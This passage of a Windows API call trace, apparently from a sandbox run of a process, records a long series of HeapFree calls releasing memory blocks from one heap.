dwFlags=0x0, lpMem=0x1fec310 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1fff520 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2012730 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2040080 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2053290 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20664a0 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20796b0 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x208c8c0 | out: hHeap=0x470000) returned 1 [0130.377] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x209fad0 | out: hHeap=0x470000) returned 1 [0130.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20b2ce0 | out: hHeap=0x470000) returned 1 [0130.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20c5ef0 | out: hHeap=0x470000) returned 1 [0130.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20d9100 | out: hHeap=0x470000) returned 1 [0130.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20ec310 | out: hHeap=0x470000) returned 1 [0130.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20ff520 | out: hHeap=0x470000) returned 1 [0130.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2112730 | out: hHeap=0x470000) returned 1 [0130.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2125940 | out: hHeap=0x470000) returned 1 [0130.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2138b50 | out: hHeap=0x470000) returned 1 [0130.592] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x214bd60 | out: hHeap=0x470000) returned 1 [0130.592] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x215ef70 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2172180 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2185390 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21985a0 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21ab7b0 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21be9c0 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21d1bd0 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21e4de0 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21f7ff0 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x220b200 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x221e410 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2240080 | out: hHeap=0x470000) returned 1 [0130.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2253290 | out: hHeap=0x470000) returned 1 [0130.599] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22664a0 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22796b0 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x228c8c0 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x229fad0 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22b2ce0 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22c5ef0 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22d9100 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22ec310 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22ff520 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2312730 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2325940 | out: hHeap=0x470000) returned 1 [0130.600] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2338b50 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x234bd60 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x235ef70 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2372180 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2385390 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23985a0 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23ab7b0 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23be9c0 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23d1bd0 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23e4de0 | out: hHeap=0x470000) returned 1 [0130.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x23f7ff0 | out: hHeap=0x470000) returned 1 [0130.610] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x240b200 | out: hHeap=0x470000) returned 1 [0130.612] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x241e410 | out: hHeap=0x470000) returned 1 [0130.612] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2431620 | out: hHeap=0x470000) returned 1 [0130.612] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2444830 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2457a40 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x246ac50 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x247de60 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2491070 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24a4280 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24b7490 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24ca6a0 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24dd8b0 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x24f0ac0 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2503cd0 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2516ee0 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x252a0f0 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x253d300 | out: hHeap=0x470000) returned 1 [0130.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2550510 | out: hHeap=0x470000) returned 1 [0130.622] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2563720 | out: hHeap=0x470000) returned 1 [0130.622] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2576930 | out: hHeap=0x470000) returned 1 [0130.623] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2589b40 | out: hHeap=0x470000) returned 1 [0130.623] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x259cd50 | out: hHeap=0x470000) returned 1 [0130.623] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25aff60 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25c3170 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25d6380 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25e9590 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x25fc7a0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x260f9b0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2622bc0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2640080 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2653290 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26664a0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26796b0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x268c8c0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x269fad0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26b2ce0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26c5ef0 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26d9100 | out: hHeap=0x470000) returned 1 [0130.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26ec310 | out: hHeap=0x470000) returned 1 [0130.943] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x26ff520 | out: hHeap=0x470000) returned 1 [0130.944] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2712730 | out: hHeap=0x470000) returned 1 [0130.944] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2725940 | out: hHeap=0x470000) returned 1 [0130.944] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2738b50 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x274bd60 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x275ef70 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2772180 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2785390 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27985a0 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27ab7b0 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27be9c0 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27d1bd0 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27e4de0 | out: hHeap=0x470000) returned 1 [0130.948] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x27f7ff0 | out: hHeap=0x470000) returned 1 [0130.949] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x280b200 | out: hHeap=0x470000) returned 1 [0130.949] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x281e410 | out: hHeap=0x470000) returned 1 [0130.949] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2831620 | out: hHeap=0x470000) returned 1 [0130.949] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2844830 | out: hHeap=0x470000) returned 1 [0130.956] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2857a40 | out: hHeap=0x470000) returned 1 [0130.956] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x286ac50 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x287de60 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2891070 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28a4280 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28b7490 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28ca6a0 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28dd8b0 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x28f0ac0 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2903cd0 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2916ee0 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x292a0f0 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x293d300 | out: hHeap=0x470000) returned 1 [0130.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2950510 | out: hHeap=0x470000) returned 1 [0130.963] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2963720 | out: hHeap=0x470000) returned 1 [0130.963] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2976930 | out: hHeap=0x470000) returned 1 [0130.963] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2989b40 | out: hHeap=0x470000) returned 1 [0130.963] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x299cd50 | out: hHeap=0x470000) returned 1 [0130.965] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29aff60 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29c3170 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29d6380 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29e9590 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x29fc7a0 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a0f9b0 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a22bc0 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a35dd0 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a48fe0 | out: hHeap=0x470000) returned 1 [0130.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a5c1f0 | out: hHeap=0x470000) returned 1 [0130.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a6f400 | out: hHeap=0x470000) returned 1 [0130.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a82610 | out: hHeap=0x470000) returned 1 [0130.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2a95820 | out: hHeap=0x470000) returned 1 [0130.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2aa8a30 | out: hHeap=0x470000) returned 1 [0130.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2abbc40 | out: hHeap=0x470000) returned 1 [0130.974] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2acee50 | out: hHeap=0x470000) returned 1 [0130.975] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ae2060 | out: hHeap=0x470000) returned 1 [0130.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2af5270 | out: hHeap=0x470000) returned 1 [0130.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b08480 | out: hHeap=0x470000) returned 1 [0130.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b1b690 | out: hHeap=0x470000) returned 1 [0130.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b2e8a0 | out: hHeap=0x470000) returned 1 [0130.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b41ab0 | out: hHeap=0x470000) returned 1 [0130.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b54cc0 | out: hHeap=0x470000) returned 1 [0130.976] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b67ed0 | out: hHeap=0x470000) returned 1 [0131.266] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b7b0e0 | out: hHeap=0x470000) returned 1 [0131.267] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2b8e2f0 | out: hHeap=0x470000) returned 1 [0131.267] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ba1500 | out: hHeap=0x470000) returned 1 [0131.267] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2bb4710 | out: hHeap=0x470000) returned 1 [0131.267] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2bc7920 | out: hHeap=0x470000) returned 1 [0131.267] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2bdab30 | out: hHeap=0x470000) returned 1 [0131.269] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2bedd40 | out: hHeap=0x470000) returned 1 [0131.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c00f50 | out: hHeap=0x470000) returned 1 [0131.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c14160 | out: hHeap=0x470000) returned 1 [0131.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c27370 | out: hHeap=0x470000) returned 1 [0131.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c3a580 | out: hHeap=0x470000) returned 1 [0131.271] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c4d790 | out: hHeap=0x470000) returned 1 [0131.271] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c609a0 | out: hHeap=0x470000) returned 1 [0131.271] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c73bb0 | out: hHeap=0x470000) returned 1 [0131.274] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c86dc0 | out: hHeap=0x470000) returned 1 [0131.274] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2c99fd0 | out: hHeap=0x470000) returned 1 [0131.274] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2cad1e0 | out: hHeap=0x470000) returned 1 [0131.274] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2cc03f0 | out: hHeap=0x470000) returned 1 [0131.274] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2cd3600 | out: hHeap=0x470000) returned 1 [0131.274] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ce6810 | out: hHeap=0x470000) returned 1 [0131.276] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2cf9a20 | out: hHeap=0x470000) returned 1 [0131.277] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d0cc30 | out: hHeap=0x470000) returned 1 [0131.277] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d1fe40 | out: hHeap=0x470000) returned 1 [0131.278] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d33050 | out: hHeap=0x470000) returned 1 [0131.278] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d46260 | out: hHeap=0x470000) returned 1 [0131.278] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d59470 | out: hHeap=0x470000) returned 1 [0131.278] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d6c680 | out: hHeap=0x470000) returned 1 [0131.278] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d7f890 | out: hHeap=0x470000) returned 1 [0131.282] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d92aa0 | out: hHeap=0x470000) returned 1 [0131.282] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2da5cb0 | out: hHeap=0x470000) returned 1 [0131.282] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2db8ec0 | out: hHeap=0x470000) returned 1 [0131.282] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2dcc0d0 | out: hHeap=0x470000) returned 1 [0131.282] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ddf2e0 | out: hHeap=0x470000) returned 1 [0131.284] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2df24f0 | out: hHeap=0x470000) returned 1 [0131.284] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e05700 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e18910 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e40080 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e53290 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e664a0 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e796b0 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e8c8c0 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2e9fad0 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2eb2ce0 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ec5ef0 | out: hHeap=0x470000) returned 1 [0131.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ed9100 | out: hHeap=0x470000) returned 1 [0131.290] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2eec310 | out: hHeap=0x470000) returned 1 [0131.291] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2eff520 | out: hHeap=0x470000) returned 1 [0131.291] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f12730 | out: hHeap=0x470000) returned 1 [0131.291] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f25940 | out: hHeap=0x470000) returned 1 [0131.291] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f38b50 | out: hHeap=0x470000) returned 1 [0131.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f4bd60 | out: hHeap=0x470000) returned 1 [0131.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f5ef70 | out: hHeap=0x470000) returned 1 [0131.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f72180 | out: hHeap=0x470000) returned 1 [0131.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f85390 | out: hHeap=0x470000) returned 1 [0131.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2f985a0 | out: hHeap=0x470000) returned 1 [0131.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fab7b0 | out: hHeap=0x470000) returned 1 [0131.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fbe9c0 | out: hHeap=0x470000) returned 1 [0131.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fd1bd0 | out: hHeap=0x470000) returned 1 [0131.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2fe4de0 | out: hHeap=0x470000) returned 1 [0131.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2ff7ff0 | out: hHeap=0x470000) returned 1 [0131.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x300b200 | out: hHeap=0x470000) returned 1 [0131.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x301e410 | out: hHeap=0x470000) returned 1 [0131.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3031620 | out: hHeap=0x470000) returned 1 [0131.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3044830 | out: hHeap=0x470000) returned 1 [0131.490] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3057a40 | out: hHeap=0x470000) returned 1 [0131.491] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x306ac50 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x307de60 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3091070 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x30a4280 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x30b7490 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x30ca6a0 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x30dd8b0 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x30f0ac0 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3103cd0 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3116ee0 | out: hHeap=0x470000) returned 1 [0131.492] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x312a0f0 | out: hHeap=0x470000) returned 1 [0131.497] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x313d300 | out: hHeap=0x470000) returned 1 [0131.500] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3150510 | out: hHeap=0x470000) returned 1 [0131.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3163720 | out: hHeap=0x470000) returned 1 [0131.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3176930 | out: hHeap=0x470000) returned 1 [0131.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3189b40 